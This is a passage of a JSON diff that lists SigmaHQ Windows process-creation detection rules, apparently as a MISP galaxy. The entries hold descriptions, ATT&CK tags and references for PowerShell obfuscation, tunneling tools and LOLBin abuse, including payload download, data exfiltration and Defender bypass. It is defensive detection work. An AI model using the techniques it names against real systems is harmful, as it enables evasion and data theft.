+ "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": 
"process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects Obfuscated use of stdin to execute PowerShell",
+ "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002",
+ "value": "Invoke-Obfuscation STDIN+ Launcher",
+ "meta": {
+ "refs": [
+ "https://github.com/Neo23x0/sigma/issues/1009",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2020/10/15",
+ "filename": "proc_creation_win_invoke_obfuscation_stdin.yml",
+ "author": "Jonathan Cheong, oscd.community",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects Obfuscated use of Environment Variables to execute PowerShell",
+ "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0",
+ "value": "Invoke-Obfuscation VAR+ Launcher",
+ "meta": {
+ "refs": [
+ "https://github.com/Neo23x0/sigma/issues/1009",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2020/10/15",
+ "filename": "proc_creation_win_invoke_obfuscation_var.yml",
+ "author": "Jonathan Cheong, oscd.community",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION",
+ "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7",
+ "value": "Invoke-Obfuscation COMPRESS OBFUSCATION",
+ "meta": {
+ "refs": [
+ "https://github.com/Neo23x0/sigma/issues/1009",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2020/10/18",
+ "filename": "proc_creation_win_invoke_obfuscation_via_compress.yml",
+ "author": "Timur Zinniatullin, oscd.community",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER",
+ "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555",
+ "value": "Invoke-Obfuscation RUNDLL LAUNCHER",
+ "meta": {
+ "refs": [
+ "https://github.com/Neo23x0/sigma/issues/1009",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2020/10/18",
+ "filename": "proc_creation_win_invoke_obfuscation_via_rundll.yml",
+ "author": "Timur Zinniatullin, oscd.community",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects Obfuscated Powershell via Stdin in Scripts",
+ "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490",
+ "value": "Invoke-Obfuscation Via Stdin",
+ "meta": {
+ "refs": [
+ "https://github.com/Neo23x0/sigma/issues/1009",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2020/10/12",
+ "filename": "proc_creation_win_invoke_obfuscation_via_stdin.yml",
+ "author": "Nikita Nazarov, oscd.community",
+ "level": "high",
+ "falsepositive": [ 
+ "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "value": "Invoke-Obfuscation Via Use Clip", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_invoke_obfuscation_via_use_clip.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", + "value": "Invoke-Obfuscation Via Use MSHTA", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_win_invoke_obfuscation_via_use_mhsta.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "uuid": "36c5146c-d127-4f85-8e21-01bf62355d5a", + "value": "Invoke-Obfuscation Via Use Rundll32", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/10/08", + "filename": "proc_creation_win_invoke_obfuscation_via_use_rundll32.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_invoke_obfuscation_via_var.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", + "value": "IOX Tunneling Tool", + "meta": { + "refs": [ + "https://github.com/EddieIvan01/iox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iox.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2022/10/08", + "filename": "proc_creation_win_iox.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": 
"windows" + } + }, + { + "description": "Detect the use of Jlaive to execute assemblies in a copied PowerShell", + "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "value": "Jlaive Usage For Assembly Execution In-Memory", + "meta": { + "refs": [ + "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", + "https://github.com/ch2sh/Jlaive", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/05/24", + "filename": "proc_creation_win_jlaive_batch_execution.yml", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Ldifde.exe with specific command line arguments to potentially load an LDIF file containing HTTP-based arguments.\nLdifde.exe is present, by default, on domain controllers and only requires user-level authentication to execute.\n", + "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "value": "Suspicious Ldifde Command Usage", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1564968845726580736", + "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/09/02", + "filename": "proc_creation_win_ldifde_file_load.yml", + "author": "@gott_cyber", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report", + "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "value": "MSHTA Spwaned by SVCHOST", + "meta": { + "refs": [ + "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lethalhta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005" + ], + "creation_date": "2018/06/07", + "filename": "proc_creation_win_lethalhta.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "uuid": "502b42de-4306-40b4-9596-6f590c81f073", + "value": "Local Accounts Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1087.001" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_local_system_owner_account_discovery.yml", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrator or user enumerates local users for legitimate reason" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as 
legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", + "value": "Use of LogMeIn Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logmein.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/11", + "filename": "proc_creation_win_logmein.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "value": "Logon Scripts (UserInitMprLogonScript)", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence" + ], + "creation_date": "2019/01/12", + "filename": "proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "level": "high", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule will monitor any office apps that spins up a new LOLBin process. 
This activity is pretty suspicious and should be investigated.", + "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", + "value": "New Lolbin Process by Office Applications", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_lolbins_by_office_applications.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule will monitor LOLBin process creations by wmiprvse. 
Add more LOLBins to rule logic if needed.", + "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "value": "Lolbins Process Creation with WmiPrvse", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_lolbins_with_wmiprvse_parent_process.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", + "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", + "value": "Use of Adplus.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", + "https://twitter.com/nas_bench/status/1534916659676422152", + "https://twitter.com/nas_bench/status/1534915321856917506", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1003.001" + ], + "creation_date": "2022/06/09", + "filename": "proc_creation_win_lolbin_adplus.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of Adplus" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + 
"description": "Execute C# code with the Build Provider and proper folder structure in place.", + "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "value": "Suspicious aspnet_compiler.exe Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2021/11/24", + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Performs execution of specified file, can be used for defensive evasion.", + "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "value": "Suspicious Subsystem for Linux Bash Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Bash/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2021/11/24", + "filename": "proc_creation_win_lolbin_bash.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user downloads file by using CertOC.exe", + "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "value": "Suspicious File Download via CertOC.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/05/16", + "filename": 
"proc_creation_win_lolbin_certoc_download.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "value": "Custom Class Execution via Xwizard", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml", + "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "value": "Execution via CL_Invocation.ps1", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/14", + "filename": "proc_creation_win_lolbin_cl_invocation.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "uuid": 
"c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "value": "CL_LoadAssembly.ps1 Proxy Execution", + "meta": { + "refs": [ + "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/05/21", + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a Microsoft signed script to execute commands", + "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "value": "CL_Mutexverifiers.ps1 Proxy Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/05/21", + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml", + "author": "oscd.community, Natalia Shornikova, frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", + "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", + "value": "Suspicious Cmdl32 Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", + "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" + ], + "tags": 
[ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ], + "creation_date": "2021/11/03", + "filename": "proc_creation_win_lolbin_cmdl32.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", + "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", + "value": "Suspicious ConfigSecurityPolicy Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can abuse of C:\\Windows\\System32\\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target", + "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "value": "GatherNetworkInfo.vbs Script Usage", + "meta": { + "refs": [ + "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" + ], + "creation_date": "2022/01/03", + "filename": "proc_creation_win_lolbin_cscript_gathernetworkinfo.yml", + "author": "blueteamer8699", + "level": "medium", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", + "value": "Suspicious CustomShellHost Execution", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/180", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_customshellhost.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe", + "meta": { + "refs": [ + "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ], + "creation_date": "2021/09/30", + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ 
+ "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "value": "DeviceCredentialDeployment Execution", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/147", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", + "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "value": "Suspicious Diantz Alternate Data Stream Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_diantz_ads.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Very Possible" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + 
}, + { + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", + "value": "Suspicious Diantz Download and Compress Into a CAB File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "value": "Xwizard DLL Sideloading", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2021/09/20", + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Windows installed on non-C drive" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "uuid": "129966c9-de17-4334-a123-8b58172e664d", + "value": "Suspicious Dump64.exe Execution", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1460597833917251595", + 
